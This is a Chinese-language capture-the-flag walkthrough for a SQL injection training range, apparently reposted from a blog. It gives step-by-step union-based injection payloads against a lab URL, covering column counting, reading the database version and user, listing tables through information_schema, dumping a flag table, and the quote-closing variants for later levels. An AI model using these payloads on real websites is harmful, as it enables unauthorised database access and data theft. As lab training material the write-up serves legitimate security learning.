1.封神台sql注入實戰靶場


封神台sql注入實戰靶場

通過注入找到數據庫中的Flag吧,Flag格式zKaQ-XXXXXXXX

基礎靶場1

http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1

數字型注入

image-20210114212424680

判斷字段個數

?id=2 order by 1
?id=2 order by 2
?id=2 order by 3
?id=2 order by 4    報錯

image-20210114212703410

得出結論字段個數為3

判斷數據在頁面的顯示位置

?id=2 and 1=2 union select 1,2,3

image-20210114213250018

判斷數據庫類型和版本

?id=2 and 1=2 union select 1,@@datadir,version()

image-20210114213402449

獲取當前庫名和用戶

?id=2 and 1=2 union select 1,database(),user()

image-20210114213456868

獲取庫下面所有的表名

?id=1 and 1=2 union select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() --+

image-20210114213721378

獲取表下面的所有字段名

?id=1 and 1=2 union select 1,group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name='error_flag' --+

image-20210114215811063

獲取值

?id=1 and 1=2 union select 1,group_concat(flag),2 from error.error_flag --+

image-20210114220016034

一下子全爆出來了,盲猜這是前四關的flag,經過驗證果然是,前四關只是sql語句的閉合方式不同而已,都可

以用聯合注入獲取flag

閉合方式

基礎靶場1     數字型,不需要閉合基礎靶場2     '基礎靶場3    ')基礎靶場4    ")


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM